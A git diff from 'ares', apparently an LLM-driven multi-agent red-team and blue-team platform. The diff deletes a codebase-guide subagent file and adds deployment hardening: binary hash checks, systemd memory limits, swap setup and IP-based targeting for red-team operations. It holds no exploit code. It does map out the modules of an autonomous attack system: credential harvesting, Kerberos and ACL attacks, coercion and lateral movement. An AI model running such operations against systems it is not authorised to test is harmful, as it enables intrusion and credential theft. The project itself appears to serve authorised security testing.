diff --git a/.claude/agents/python-ares-expert.md b/.claude/agents/python-ares-expert.md
deleted file mode 100644
index 4663ce3e..00000000
--- a/.claude/agents/python-ares-expert.md
+++ /dev/null
@@ -1,131 +0,0 @@
----
-name: python-ares-expert
-description: Expert on the Python ares codebase at ../ares (src/ares/). Use when you need to understand Python ares architecture, look up how something works in Python, find equivalent implementations, or answer questions about the original Python system before porting to Rust.
-tools: Read, Glob, Grep, Bash
-model: sonnet
----
-
-You are an expert on the **Python ares codebase** located at `/Users/l/dreadnode/ares`. Your job is to answer questions about the Python implementation accurately by reading the actual source code.
-
-## Project Overview
-
-Ares is an autonomous security operations multi-agent system with:
-
-- **Red Team**: LLM-powered penetration testing with coordinator/worker architecture
-- **Blue Team**: SOC alert investigation and threat hunting
-
-Built on the Dreadnode Agent SDK, rigging (LLM framework), and MITRE ATT&CK.
-
-## Codebase Layout
-
-```
-/Users/l/dreadnode/ares/
- src/ares/
- core/ # Core framework
- dispatcher/ # Task dispatcher (routing, throttling, result processing, publishing)
- worker/ # Worker agent (_worker.py, operations.py, prompts.py, dc_resolution.py)
- orchestrator/ # Orchestrator (_orchestrator.py)
- factories/ # Agent factories (red_agents.py, blue_factory.py)
- replay/ # Deterministic replay
- persistent_store/ # Persistent storage
- blue_dispatcher/ # Blue team dispatcher
- blue_worker/ # Blue team worker
- models.py # ALL data models (Credential, Host, Hash, Target, SharedRedTeamState, etc.)
- config.py # Configuration loading
- state_backend.py # Redis state backend (red team)
- blue_state_backend.py # Redis state backend (blue team)
- task_queue.py # Redis task queue (red team)
- blue_task_queue.py # Redis task queue (blue team)
- redis_client.py # Redis client wrapper
- recovery.py # Checkpoint/recovery
- persistence.py # State serialization
- workflows.py # Credential expansion workflows
- engines.py # Question generation engines
- correlation.py # Red-Blue correlation
- evidence_validation.py # Evidence dedup/validation
- k8s_executor.py # Kubernetes pod execution
- lateral_analyzer.py # Graph-based lateral movement
- messages.py # Inter-agent messages
- orchestrator_client.py # Client for orchestrator communication
- orchestrator_service.py # Orchestrator service pod
- query_resilience.py # Query retry logic
- remote.py # Remote K8s execution
- templates.py # Jinja2 template loading
- tracing.py # OpenTelemetry tracing
- capability_registry.py # Agent capability registration
- context_manager.py # LLM context window management
- tool_retrieval.py # Dynamic tool loading
- circuit_breaker.py # Circuit breaker pattern
- tools/
- red/ # Red team tools
- credential_discovery/ # discovery.py, harvesting.py, cracking.py, pilfering.py
- reconnaissance.py # nmap, enum4linux, user/share enumeration
- orchestrator.py # Dispatch functions
- kerberos_attacks.py # Delegation, tickets, ADCS
- lateral_movement.py # psexec, wmi, smb, evil-winrm
- acl_attacks.py # bloodyAD, pywhisker, dacledit
- privilege_escalation.py
- coercion.py # PetitPotam, Coercer, relay
- cve_exploits.py
- reporting.py
- common.py
- blue/ # Blue team tools
- investigation.py, grafana.py, query_templates.py, observability.py, actions.py, learning.py
- shared/
- mitre.py # MITRE ATT&CK integration
- agents/
- red/ # Red team agents (dynamic via factories)
- blue/
- soc_investigator.py # SOC investigation orchestrator
- integrations/ # Third-party integrations
- reports/ # Report generation (investigation.py, redteam.py, blueteam.py)
- eval/ # Evaluation framework
- templates/ # Jinja2 prompt templates
- redteam/agents/ # Per-role agent prompts (orchestrator.md.jinja, recon.md.jinja, etc.)
- main.py # CLI entry point
- cli_ops.py # CLI operations (loot, status, inject, etc.)
- cli_blue_ops.py # Blue team CLI operations
- cli_history.py # CLI history
- tests/ # Test suite
- docs/
- codemap.md # Full codebase map
- red.md # Red team architecture (AUTHORITATIVE)
- blue.md # Blue team workflow
- config/
- multi-agent-production.yaml # Agent configurations
-```
-
-## Multi-Agent Architecture
-
-- **Orchestrator**: Central LLM coordinator, dispatches tasks, never executes tools directly
-- **Workers**: RECON, CREDENTIAL_ACCESS, CRACKER, ACL, PRIVESC, LATERAL, COERCION
-- **Communication**: Redis pub/sub + task queues
-- **State**: Write-through cache (memory + Redis persistence)
-- **Namespace**: `attack-simulation` in Kubernetes
-
-## Key Design Patterns
-
-1. **Write-through cache**: `SharedRedTeamState` in memory, persisted to Redis via `state_backend.py`
-2. **Task queue**: Redis-based with priority routing in `task_queue.py`
-3. **Result processing**: `dispatcher/result_processing.py` extracts credentials/hashes from tool output
-4. **Publishing**: `dispatcher/publishing.py` broadcasts discovered credentials to all agents
-5. **Recovery**: `recovery.py` can restore operation state from Redis checkpoints
-6. **Factory pattern**: `factories/red_agents.py` maps AgentRole -> toolsets (ROLE_TOOLSETS)
-
-## How to Answer Questions
-
-1. **Always read the actual source files** before answering - don't guess from the layout alone
-2. Start with the most relevant file based on the question
-3. For architecture questions, read `docs/red.md` and `docs/codemap.md`
-4. For model/data questions, read `src/ares/core/models.py`
-5. For tool implementations, read the specific file in `src/ares/tools/red/`
-6. For orchestration logic, read `src/ares/core/dispatcher/` and `src/ares/core/orchestrator/`
-7. Be precise: include file paths, function names, and line numbers
-8. When asked "how does X work", trace the full code path
-
-## Important Context
-
-- This codebase is being ported to Rust (the parent project at `/Users/l/dreadnode/ares-rust-cli/ares-rust/`)
-- Questions will often be about understanding the Python implementation to inform the Rust port
-- The Python codebase uses: rigging (LLM), loguru (logging), redis, kubernetes, cyclopts (CLI), pydantic (models)
-- Domain conventions: `contoso.local` (primary), `fabrikam.local` (secondary), `192.168.58.x` subnet
diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml
index bbe3514b..7528b8c1 100644
--- a/.taskfiles/ec2/Taskfile.yaml
+++ b/.taskfiles/ec2/Taskfile.yaml
@@ -161,21 +161,32 @@ tasks:
"aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares-src.tar.gz /tmp/ares-src.tar.gz",
"tar -xzf /tmp/ares-src.tar.gz -C " + $build_dir,
"cd " + $build_dir + " && cargo build --profile dev-deploy -p ares-cli 2>&1",
- "cp " + $build_dir + "/target/dev-deploy/ares /usr/local/bin/ares && chmod +x /usr/local/bin/ares",
+ "SRC=" + $build_dir + "/target/dev-deploy/ares",
+ "if [ ! -f \"$SRC\" ]; then echo ERROR: build artifact missing at $SRC; exit 1; fi",
+ "BUILD_RAW=$(sha256sum \"$SRC\"); BUILD_SHA=${BUILD_RAW%% *}",
+ "echo Build SHA: $BUILD_SHA",
+ "install -m 755 \"$SRC\" /usr/local/bin/ares",
+ "DEPLOY_RAW=$(sha256sum /usr/local/bin/ares); DEPLOY_SHA=${DEPLOY_RAW%% *}",
+ "echo Deploy SHA: $DEPLOY_SHA",
+ "if [ \"$BUILD_SHA\" != \"$DEPLOY_SHA\" ]; then echo ERROR: deployed sha differs from build artifact build=$BUILD_SHA deploy=$DEPLOY_SHA; exit 1; fi",
"echo Deployed: && ls -lh /usr/local/bin/ares"
]}' > "$PARAMS_FILE"
+      # Clean cargo builds on a t3.medium can run 15-25 min: the cargo cache
+      # may have been wiped by an EC2 reboot, and even incremental builds
+      # still need to relink. Allow 30 min for both the SSM command itself
+      # and the local polling loop so we don't bail mid-build with an
+      # "InProgress" report.
CMD_ID=$(aws ssm send-command \
--profile "{{.EC2_PROFILE}}" \
--region "{{.EC2_REGION}}" \
--instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" \
--parameters "file://$PARAMS_FILE" \
- --timeout-seconds 600 \
+ --timeout-seconds 1800 \
--query "Command.CommandId" --output text)
- # Poll for completion (up to 10 minutes)
- for i in $(seq 1 300); do
+ # Poll for completion (up to 30 minutes)
+ for i in $(seq 1 900); do
STATUS=$(aws ssm get-command-invocation \
--profile "{{.EC2_PROFILE}}" \
--region "{{.EC2_REGION}}" \
@@ -291,11 +302,25 @@ tasks:
fi
ls -lh "$BIN_PATH"
+      # Pin the sha256 of what we're about to ship so the SSM deploy step can
+      # verify that the binary landing in /usr/local/bin/ares matches it
+      # exactly. Without this, the cp can silently fail to overwrite (ETXTBSY,
+      # an immutable attribute, symlink redirection, a prior deploy race) and
+      # the task still reports success.
+ if command -v sha256sum >/dev/null 2>&1; then
+ BUILD_SHA=$(sha256sum "$BIN_PATH" | awk '{print $1}')
+ else
+ BUILD_SHA=$(shasum -a 256 "$BIN_PATH" | awk '{print $1}')
+ fi
+ echo -e "{{.INFO}} Build SHA: $BUILD_SHA"
+ mkdir -p target/.deploy
+ echo "$BUILD_SHA" > target/.deploy/ares.sha256
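+      # Manual spot-check of the pin once the upload below completes
+      # (hypothetical one-liner; BUCKET/PREFIX stand in for the real vars,
+      # and the SSM deploy step automates the same comparison on the
+      # instance):
+      #   aws s3 cp "s3://$BUCKET/$PREFIX/ares" - | sha256sum | cut -d' ' -f1 \
+      #     | diff - target/.deploy/ares.sha256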
+
echo -e "{{.INFO}} Uploading binary to s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/..."
aws s3 cp "$BIN_PATH" "s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/ares" \
--profile "{{.EC2_PROFILE}}" --region "{{.EC2_REGION}}"
- echo -e "{{.SUCCESS}} Binary staged in S3"
+ echo -e "{{.SUCCESS}} Binary staged in S3 (sha=$BUILD_SHA)"
# Pull from S3 on EC2 via SSM + verify (skip for remote builds)
- |
@@ -316,11 +341,30 @@ tasks:
echo -e "{{.INFO}} Pulling binaries from S3 to $INSTANCE_ID..."
+ EXPECTED_SHA=""
+ if [ -f target/.deploy/ares.sha256 ]; then
+ EXPECTED_SHA=$(cat target/.deploy/ares.sha256)
+ fi
+
PARAMS_FILE=$(mktemp)
trap "rm -f $PARAMS_FILE" EXIT
- jq -n --arg bucket "{{.BCP_BUCKET}}" --arg prefix "{{.S3_DEPLOY_PREFIX}}" \
- '{"commands": ["set -e; aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /usr/local/bin/ares; chmod +x /usr/local/bin/ares; echo Deployed:; ls -lh /usr/local/bin/ares"]}' \
- > "$PARAMS_FILE"
+ jq -n \
+ --arg bucket "{{.BCP_BUCKET}}" \
+ --arg prefix "{{.S3_DEPLOY_PREFIX}}" \
+ --arg expected_sha "$EXPECTED_SHA" \
+ '{"commands": [
+ "set -ex",
+ "aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /tmp/ares.staged",
+ "STAGED_RAW=$(sha256sum /tmp/ares.staged); STAGED_SHA=${STAGED_RAW%% *}",
+ "echo Staged SHA: $STAGED_SHA",
+ "if [ -n \"" + $expected_sha + "\" ] && [ \"$STAGED_SHA\" != \"" + $expected_sha + "\" ]; then echo ERROR: S3 staged binary sha mismatch expected=" + $expected_sha + " staged=$STAGED_SHA; exit 1; fi",
+ "install -m 755 /tmp/ares.staged /usr/local/bin/ares",
+ "DEPLOY_RAW=$(sha256sum /usr/local/bin/ares); DEPLOY_SHA=${DEPLOY_RAW%% *}",
+ "echo Deploy SHA: $DEPLOY_SHA",
+ "if [ \"$STAGED_SHA\" != \"$DEPLOY_SHA\" ]; then echo ERROR: deployed sha differs from staged staged=$STAGED_SHA deploy=$DEPLOY_SHA; exit 1; fi",
+ "rm -f /tmp/ares.staged",
+ "echo Deployed: && ls -lh /usr/local/bin/ares"
+ ]}' > "$PARAMS_FILE"
CMD_ID=$(aws ssm send-command \
--profile "{{.EC2_PROFILE}}" \
@@ -966,6 +1010,7 @@ tasks:
SECRETS_ID: '{{.SECRETS_ID | default "ares/api-keys"}}'
LLM_MODEL: '{{.LLM_MODEL | default ""}}'
FLUSH_REDIS: '{{.FLUSH_REDIS | default "true"}}'
+ OPERATION_ID: '{{.OPERATION_ID | default ""}}'
cmds:
- |
INSTANCE_ID=$(aws ec2 describe-instances \
@@ -981,7 +1026,11 @@ tasks:
exit 1
fi
- OP_ID="op-$(date -u +%Y%m%d-%H%M%S)"
+ if [ -n "{{.OPERATION_ID}}" ]; then
+ OP_ID="{{.OPERATION_ID}}"
+ else
+ OP_ID="op-$(date -u +%Y%m%d-%H%M%S)"
+ fi
echo -e "{{.INFO}} Operation ID: $OP_ID"
# Build target IPs JSON array
@@ -1018,6 +1067,10 @@ tasks:
ANTHROPIC_KEY=$(echo "$SECRETS" | jq -r .ANTHROPIC_API_KEY)
GRAFANA_URL_VAL=$(echo "$SECRETS" | jq -r '.GRAFANA_URL // empty')
GRAFANA_TOKEN_VAL=$(echo "$SECRETS" | jq -r '.GRAFANA_SERVICE_ACCOUNT_TOKEN // empty')
+ LOKI_URL_VAL=$(echo "$SECRETS" | jq -r '.LOKI_URL // empty')
+ if [ -z "$LOKI_URL_VAL" ]; then
+ LOKI_URL_VAL="{{.LOKI_URL}}"
+ fi
DREADNODE_API_KEY=$(echo "$SECRETS" | jq -r '.DREADNODE_API_KEY // empty')
OTEL_TRACES_ENDPOINT="{{.OTEL_TRACES_ENDPOINT}}"
@@ -1035,6 +1088,9 @@ tasks:
ENV_FILE_CMD="$ENV_FILE_CMD; echo 'GRAFANA_SERVICE_ACCOUNT_TOKEN=${GRAFANA_TOKEN_VAL}' >> /etc/ares/env"
fi
fi
+ if [ -n "$LOKI_URL_VAL" ]; then
+ ENV_FILE_CMD="$ENV_FILE_CMD; echo 'LOKI_URL=${LOKI_URL_VAL}' >> /etc/ares/env"
+ fi
ENV_FILE_CMD="$ENV_FILE_CMD; echo 'ARES_DEPLOYMENT={{.EC2_DEPLOYMENT}}' >> /etc/ares/env"
# OTEL: send traces to Alloy OTLP gateway → Tempo via HTTP/protobuf
ENV_FILE_CMD="$ENV_FILE_CMD; echo 'OTEL_EXPORTER_OTLP_TRACES_ENDPOINT=${OTEL_TRACES_ENDPOINT}' >> /etc/ares/env"
@@ -1053,6 +1109,7 @@ tasks:
export ANTHROPIC_API_KEY='${ANTHROPIC_KEY}'
export GRAFANA_URL='${GRAFANA_URL_VAL}'
export GRAFANA_SERVICE_ACCOUNT_TOKEN='${GRAFANA_TOKEN_VAL}'
+ export LOKI_URL='${LOKI_URL_VAL}'
export ARES_REDIS_URL=redis://127.0.0.1:6379
{{- if .LLM_MODEL}}
export ARES_LLM_MODEL='{{.LLM_MODEL}}'
diff --git a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl
index 619a4bc2..0e1ff0dc 100755
--- a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl
+++ b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl
@@ -1,6 +1,11 @@
#!/bin/bash
-# Launch ares orchestrator with environment variables
-# Placeholders are substituted by the calling task via envsubst/sed
+# Launch ares orchestrator in its own systemd transient unit so it (and any
+# tool subprocesses it spawns) gets its own cgroup, separate from
+# amazon-ssm-agent.service. Otherwise everything launched by SSM
+# RunShellScript inherits SSM's cgroup and competes with it for memory —
+# resulting in CONSTRAINT_MEMCG OOM-kills regardless of OOMScoreAdjust.
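+#
+# To confirm the split on a live box (informational, not run by this script):
+#   systemctl show ares-orchestrator.service -p ControlGroup -p MemoryMax
+#   systemd-cgls --unit system-ares.slice   # orchestrator + tool children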
+set -euo pipefail
+
export ARES_REDIS_URL=redis://127.0.0.1:6379
export RUST_LOG=info
export ARES_OPERATION_ID='__ARES_PAYLOAD__'
@@ -13,6 +18,7 @@ export DREADNODE_WORKSPACE='__DREADNODE_WORKSPACE__'
export DREADNODE_PROJECT='__DREADNODE_PROJECT__'
export GRAFANA_SERVICE_ACCOUNT_TOKEN='__GRAFANA_TOKEN__'
export GRAFANA_URL='__GRAFANA_URL__'
+export LOKI_URL='__LOKI_URL__'
_llm_model='__ARES_LLM_MODEL__'
if [ -n "$_llm_model" ] && [ "$_llm_model" = "${_llm_model#__}" ]; then
export ARES_LLM_MODEL="$_llm_model"
@@ -25,13 +31,57 @@ if [ -n "$_blue_model" ] && [ "$_blue_model" = "${_blue_model#__}" ]; then
fi
export ARES_DEPLOYMENT='__ARES_DEPLOYMENT__'
export ARES_CONFIG=/etc/ares/config.yaml
+export ARES_MAX_CONCURRENT_TASKS=8
_otel_endpoint='__OTEL_TRACES_ENDPOINT__'
if [ -n "$_otel_endpoint" ] && [ "$_otel_endpoint" = "${_otel_endpoint#__}" ]; then
export OTEL_EXPORTER_OTLP_TRACES_ENDPOINT="$_otel_endpoint"
export OTEL_EXPORTER_OTLP_PROTOCOL='http/protobuf'
export OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red'
fi
+
+mkdir -p /var/log/ares
+
+# Stop any prior orchestrator (transient unit or stray nohup process).
+systemctl stop ares-orchestrator.service 2>/dev/null || true
+systemctl reset-failed ares-orchestrator.service 2>/dev/null || true
pkill -f 'ares orchestrator' 2>/dev/null || true
sleep 1
-nohup /usr/local/bin/ares orchestrator >/var/log/ares/orchestrator.log 2>&1 &
-echo "Orchestrator started (PID: $!)"
+
+# Spawn as a transient systemd service in system-ares.slice. --setenv=NAME
+# (no value) inherits from current environment, preserving quoting that
+# would otherwise be mangled by EnvironmentFile parsing of JSON payloads.
+exec systemd-run \
+ --unit=ares-orchestrator.service \
+ --slice=system-ares.slice \
+ --description="Ares Orchestrator (transient)" \
+ --collect \
+ --setenv=ARES_REDIS_URL \
+ --setenv=RUST_LOG \
+ --setenv=ARES_OPERATION_ID \
+ --setenv=OPENAI_API_KEY \
+ --setenv=ANTHROPIC_API_KEY \
+ --setenv=DREADNODE_API_KEY \
+ --setenv=DREADNODE_SERVER_URL \
+ --setenv=DREADNODE_ORGANIZATION \
+ --setenv=DREADNODE_WORKSPACE \
+ --setenv=DREADNODE_PROJECT \
+ --setenv=GRAFANA_SERVICE_ACCOUNT_TOKEN \
+ --setenv=GRAFANA_URL \
+ --setenv=LOKI_URL \
+ --setenv=ARES_LLM_MODEL \
+ --setenv=ARES_TOOL_DISPATCH \
+ --setenv=ARES_BLUE_ENABLED \
+ --setenv=ARES_BLUE_LLM_MODEL \
+ --setenv=ARES_DEPLOYMENT \
+ --setenv=ARES_CONFIG \
+ --setenv=ARES_MAX_CONCURRENT_TASKS \
+ --setenv=OTEL_EXPORTER_OTLP_TRACES_ENDPOINT \
+ --setenv=OTEL_EXPORTER_OTLP_PROTOCOL \
+ --setenv=OTEL_RESOURCE_ATTRIBUTES \
+ --property=StandardOutput=append:/var/log/ares/orchestrator.log \
+ --property=StandardError=append:/var/log/ares/orchestrator.log \
+ --property=OOMScoreAdjust=-500 \
+ --property=TasksMax=4096 \
+ --property=MemoryHigh=8G \
+ --property=MemoryMax=10G \
+ /usr/local/bin/ares orchestrator
diff --git a/.taskfiles/ec2/scripts/setup.sh b/.taskfiles/ec2/scripts/setup.sh
index f073ecfd..858fcfd8 100755
--- a/.taskfiles/ec2/scripts/setup.sh
+++ b/.taskfiles/ec2/scripts/setup.sh
@@ -21,6 +21,46 @@ fi
echo "=== Creating directories ==="
mkdir -p /var/log/ares /etc/ares
+echo "=== Removing legacy ares-worker@ unit (renamed in PR #226) ==="
+if [ -f /etc/systemd/system/ares-worker@.service ]; then
+ for role in recon credential_access cracker acl privesc lateral coercion; do
+ systemctl disable --now "ares-worker@${role}.service" 2>/dev/null || true
+ done
+ rm -f /etc/systemd/system/ares-worker@.service
+fi
+
+echo "=== Creating system-ares.slice with global memory cap ==="
+cat >/etc/systemd/system/system-ares.slice <<'SLICE_EOF'
+[Unit]
+Description=Ares system slice (orchestrator + workers)
+Before=slices.target
+
+[Slice]
+MemoryMax=12G
+MemoryHigh=10G
+TasksMax=8192
+SLICE_EOF
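+# Sanity check once any unit runs in the slice (assumes cgroup v2; the dash
+# in the name nests it under system.slice):
+#   systemctl show system-ares.slice -p MemoryHigh -p MemoryMax -p TasksMax
+#   cat /sys/fs/cgroup/system.slice/system-ares.slice/memory.max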
+
+echo "=== Ensuring 4G swap file (OOM cushion) ==="
+if [ ! -f /swapfile ] || [ "$(stat -c%s /swapfile 2>/dev/null || echo 0)" -lt 4000000000 ]; then
+ swapoff /swapfile 2>/dev/null || true
+ rm -f /swapfile
+ fallocate -l 4G /swapfile || dd if=/dev/zero of=/swapfile bs=1M count=4096
+ chmod 600 /swapfile
+ mkswap /swapfile
+ swapon /swapfile
+ if ! grep -q '^/swapfile' /etc/fstab; then
+ echo '/swapfile none swap sw 0 0' >>/etc/fstab
+ fi
+fi
+
+echo "=== Tuning OOM behavior (oom_kill_allocating_task, swappiness) ==="
+cat >/etc/sysctl.d/90-ares.conf <<'SYSCTL_EOF'
+vm.oom_kill_allocating_task = 1
+vm.swappiness = 10
+SYSCTL_EOF
+sysctl -p /etc/sysctl.d/90-ares.conf >/dev/null
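+# Quick verification (informational):
+#   swapon --show                                      # expect /swapfile, 4G
+#   sysctl vm.oom_kill_allocating_task vm.swappiness   # expect 1 and 10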
+
echo "=== Creating systemd worker template unit ==="
cat >/etc/systemd/system/ares@.service <<'UNIT_EOF'
[Unit]
@@ -42,9 +82,19 @@ RestartSec=5
StandardOutput=append:/var/log/ares/%i.log
StandardError=append:/var/log/ares/%i.log
+# Contain child processes (netexec, hashcat, nmap, etc.) within this cgroup.
+# Without these limits, runaway tool processes can OOM the entire system and
+# take down the SSM agent (see: Apr 2026 incident).
+Delegate=yes
+Slice=system-ares.slice
+MemoryHigh=1500M
+MemoryMax=2G
+TasksMax=256
+
[Install]
WantedBy=multi-user.target
UNIT_EOF
+systemctl daemon-reload
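+
+# Under these caps the kernel reclaims/throttles a worker at MemoryHigh and
+# the cgroup OOM killer fires at MemoryMax, so a runaway tool in e.g.
+# ares@cracker dies without touching the SSM agent. Inspect a live worker
+# (hypothetical instance name):
+#   systemctl status ares@cracker --no-pager | grep -E 'Memory|Tasks'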
echo "=== Installing cracking tools ==="
if ! command -v hashcat >/dev/null 2>&1 || ! command -v john >/dev/null 2>&1; then
diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml
index 73b2119a..b93cb879 100644
--- a/.taskfiles/red/Taskfile.yaml
+++ b/.taskfiles/red/Taskfile.yaml
@@ -19,12 +19,13 @@ tasks:
# ===========================================================================
multi:
- desc: "Run multi-agent red team operation (usage: task red:multi [TARGET=dreadgoad] [DOMAIN=contoso.local] [TARGET_ENV=staging])"
+ desc: "Run multi-agent red team operation (usage: task red:multi [TARGET=dreadgoad] [DOMAIN=contoso.local] [TARGET_ENV=staging] [IPS=10.1.10.10,10.1.10.11])"
silent: true
vars:
OPERATION_ID: '{{.OPERATION_ID | default ""}}'
RESUME: '{{.RESUME | default "false"}}'
TARGET_ENV: '{{.TARGET_ENV | default "staging"}}'
+ IPS: '{{.IPS | default ""}}'
OPERATION_ID_COMPUTED:
sh: |
if [ -n "{{.OPERATION_ID}}" ]; then
@@ -71,6 +72,14 @@ tasks:
MODEL_OVERRIDE_ENV="ARES_MODEL_OVERRIDE={{.MODEL}}"
fi
+ # When IPS is supplied, target IPs directly and skip EC2 Name-tag resolution
+ # (the orchestrator pod has no `aws` CLI). Otherwise default to AWS lookup.
+ if [ -n "{{.IPS}}" ]; then
+ TARGET_FLAGS="--ips {{.IPS}}"
+ else
+ TARGET_FLAGS="--resolve-targets --aws-profile {{.TARGET_PROFILE}} --aws-region {{.TARGET_REGION}}"
+ fi
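+      # Example invocation (per the desc above):
+      #   task red:multi IPS=10.1.10.10,10.1.10.11 DOMAIN=contoso.local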
+
# CLI auto-loads .env if present, or use --secrets-from 1password
kubectl exec -i -n {{.K8S_NAMESPACE}} deploy/ares-orchestrator -- \
env $MODEL_OVERRIDE_ENV \
@@ -82,9 +91,7 @@ tasks:
GRAFANA_URL="{{.GRAFANA_URL}}" \
ares --redis-url "{{.REDIS_URL}}" ops submit \
"{{.TARGET}}" "{{.DOMAIN}}" \
- --resolve-targets \
- --aws-profile "{{.TARGET_PROFILE}}" \
- --aws-region "{{.TARGET_REGION}}" \
+ $TARGET_FLAGS \
--pin-active \
--operation-id "{{.OPERATION_ID_COMPUTED}}" \
--model "{{.MODEL}}" \
@@ -738,6 +745,7 @@ tasks:
BLUE_ENABLED: '{{.BLUE_ENABLED | default "0"}}'
BLUE_LLM_MODEL: '{{.BLUE_LLM_MODEL | default ""}}'
EC2_DEPLOYMENT: '{{.EC2_DEPLOYMENT | default "alpha-operator-range"}}'
+ STRATEGY: '{{.STRATEGY | default "comprehensive"}}'
RESOLVED_TARGETS:
sh: |
TARGET="{{.TARGET}}"
@@ -867,7 +875,7 @@ tasks:
# Build JSON payload for ARES_OPERATION_ID
TARGET_IPS_JSON=$(echo "{{.RESOLVED_TARGETS}}" | tr ',' '\n' | sed 's/^/"/;s/$/"/' | paste -sd, - | sed 's/^/[/;s/$/]/')
- ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\"}"
+ ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\",\"strategy\":\"{{.STRATEGY}}\"}"
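+      # Resulting payload shape, consumed by the orchestrator wrapper loop:
+      #   {"operation_id":"op-...","target_domain":"contoso.local",
+      #    "target_ips":["10.1.10.10"],"model":"gpt-5.2","strategy":"comprehensive"}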
# Build orchestrator launch script from template
ORCH_SCRIPT=$(mktemp)
@@ -882,6 +890,7 @@ tasks:
-e "s|__DREADNODE_PROJECT__|{{.DREADNODE_PROJECT}}|" \
-e "s|__GRAFANA_TOKEN__|${GRAFANA_SERVICE_ACCOUNT_TOKEN:-}|" \
-e "s|__GRAFANA_URL__|{{.GRAFANA_URL}}|" \
+ -e "s|__LOKI_URL__|{{.LOKI_URL}}|" \
-e "s|__ARES_LLM_MODEL__|{{.MODEL}}|" \
-e "s|__ARES_BLUE_ENABLED__|{{.BLUE_ENABLED}}|" \
-e "s|__ARES_BLUE_LLM_MODEL__|{{.BLUE_LLM_MODEL}}|" \
diff --git a/.taskfiles/remote/orchestrator-wrapper-patch.json b/.taskfiles/remote/orchestrator-wrapper-patch.json
index 9ee1be92..67009f79 100644
--- a/.taskfiles/remote/orchestrator-wrapper-patch.json
+++ b/.taskfiles/remote/orchestrator-wrapper-patch.json
@@ -8,7 +8,7 @@
"op": "replace",
"path": "/spec/template/spec/containers/0/args",
"value": [
- "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n echo \"Starting operation: ${OP_ID:-unknown}\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation ${OP_ID:-unknown} exited with status $status\" >&2\n fi\ndone"
+ "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n case \"$OP_REQUEST\" in *\"\\\"operation_id\\\"\"*) ;; *) OP_REQUEST=\"\" ;; esac\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n if [ -z \"$OP_ID\" ]; then\n echo \"Skipping malformed op request\" >&2\n continue\n fi\n echo \"Starting operation: $OP_ID\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation $OP_ID exited with status $status\" >&2\n fi\ndone"
]
}
]
diff --git a/Cargo.lock b/Cargo.lock
index c3ce37e8..82d86d55 100644
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -118,6 +118,7 @@ dependencies = [
"chrono",
"clap",
"dotenvy",
+ "hickory-resolver",
"redis",
"regex",
"rstest",
@@ -189,6 +190,7 @@ dependencies = [
"anyhow",
"approx",
"ares-core",
+ "base64",
"chrono",
"redis",
"regex",
@@ -602,6 +604,12 @@ dependencies = [
"hybrid-array",
]
+[[package]]
+name = "data-encoding"
+version = "2.11.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a4ae5f15dda3c708c0ade84bfee31ccab44a3da4f88015ed22f63732abe300c8"
+
[[package]]
name = "der"
version = "0.7.10"
@@ -674,6 +682,18 @@ dependencies = [
"serde",
]
+[[package]]
+name = "enum-as-inner"
+version = "0.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a1e6a265c649f3f5979b601d26f1d05ada116434c87741c9493cb56218f76cbc"
+dependencies = [
+ "heck",
+ "proc-macro2",
+ "quote",
+ "syn",
+]
+
[[package]]
name = "equivalent"
version = "1.0.2"
@@ -998,6 +1018,51 @@ version = "0.4.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "7f24254aa9a54b5c858eaee2f5bccdb46aaf0e486a595ed5fd8f86ba55232a70"
+[[package]]
+name = "hickory-proto"
+version = "0.24.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "92652067c9ce6f66ce53cc38d1169daa36e6e7eb7dd3b63b5103bd9d97117248"
+dependencies = [
+ "async-trait",
+ "cfg-if",
+ "data-encoding",
+ "enum-as-inner",
+ "futures-channel",
+ "futures-io",
+ "futures-util",
+ "idna",
+ "ipnet",
+ "once_cell",
+ "rand 0.8.6",
+ "thiserror 1.0.69",
+ "tinyvec",
+ "tokio",
+ "tracing",
+ "url",
+]
+
+[[package]]
+name = "hickory-resolver"
+version = "0.24.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cbb117a1ca520e111743ab2f6688eddee69db4e0ea242545a604dce8a66fd22e"
+dependencies = [
+ "cfg-if",
+ "futures-util",
